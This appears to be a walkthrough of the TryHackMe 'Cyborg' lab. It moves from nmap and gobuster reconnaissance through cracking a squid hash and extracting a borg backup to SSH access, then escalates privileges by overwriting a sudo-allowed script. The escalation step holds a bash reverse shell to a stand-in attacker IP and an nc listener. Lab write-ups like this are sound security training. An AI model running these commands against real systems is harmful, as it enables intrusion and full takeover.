Cyborg
Room Details
TryHackMe Cyborg room contains:
Service Discovery
Web Content Discovery
Hash Cracking
Data Decompression
Privilege Escalation
Target
IP: 10.10.230.194
Service Discovery
Scan for open ports with nmap
$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/10%OT=22%CT=1%CU=35008%PV=Y%DS=4%DC=T%G=Y%TM=62CAA3E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 279.37 ms 10.2.0.1
2 ... 3
4 514.99 ms 10.10.230.194
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Services Discovered
ServicePortVersionHTTP
80
Apache 2.4.18
SSH
22
OpenSSH 7.2p2
OS:
Ubuntufrom service descriptionAnswer Task 2 first three questions
Web Content Discovery
Scan for directories using
gobustergobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txtDirectories Discovered
/admin
homepage
from archive dropdown found archive.tar file
/etc
squid proxy
squid password and configuration files
Analyzing Directories
From
/etcfound/etc/squid/passwdwhich contains password hash and squid config file/etc/squid/squid.conf# reading files # /etc/squid/passwd music_archive:{REDACTED} # /etc/squid/squid.conf auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd auth_param basic children 5 auth_param basic realm Squid Basic Authentication auth_param basic credentialsttl 2 hours acl auth_users proxy_auth REQUIRED http_access allow auth_users
Cracking Password Hash
Store hash into a file
passwd_hash.txtCrack the hash using hashcat
john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txtsquidward (music_archive)
We've successfully found the password from the hash
Analyzing Tar file
extract tar file
tar -xvf archive.tarFound readme file which leads us to the borg documentation page
We need to install borg to extract the files from the compressed format
Install borg
sudo apt install borgbackup -yFor debian based For other distribution refer borg installation documentation
decompress extracted files from
archive.tarusing borgborg extract ./home/field/dev/final_archive::music_archiveAfter files are decompressed successfully, it data turns out to the home directory backup for alex's account
Found Password from
/home/alex/Documents/note.txtWow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down! alex:{REDACTED}
Login with ssh
Login using alex's
ssh alex@10.10.230.194 alex@10.10.230.194 password: # enter password from note.txt Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 27 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. alex@ubuntu:~$We got access to Alex Account
Get User Flag
alex@ubuntu:~$ cat user.txt
flag{REDACTED}Privilege Escalation
Check for sudo exectuables
alex@ubuntu:~$ sudo -l Matching Defaults entries for alex on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alex may run the following commands on ubuntu: (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.shWe can run file
/etc/mp3backups/backup.shas with root privilegesCheck whether file is writable
alex@ubuntu:~$ ls -la /etc/mp3backups/backup.sh -r-xr-xr-- 1 alex alex 1083 Dec 30 2020 /etc/mp3backups/backup.shWe cannot write file, but user is alex, so we can change file permissions using chmod
Allow all permissions to the files
alex@ubuntu:~$ chmod 777 /etc/mp3backups/backup.shNote: Allowing all users rwx permissions isn't a good practice, but for ease, I've provided them rights
Overwrite file with Bash Reverse Shell on alex's machine
alex@ubuntu:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.shReverse shell will connect to attacker's machine on port 4444
Start netcat on attacker's machine
nc -nlvp 4444Execute bash script from target machine
alex@ubuntu:~$ sudo /etc/mp3backups/backup.shNow, we've successfully rooted the machine
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492 root@ubuntu:~#
Get Root Flag
root@ubuntu:~# cat root.txt
flag{REDACTED}Last updated
Was this helpful?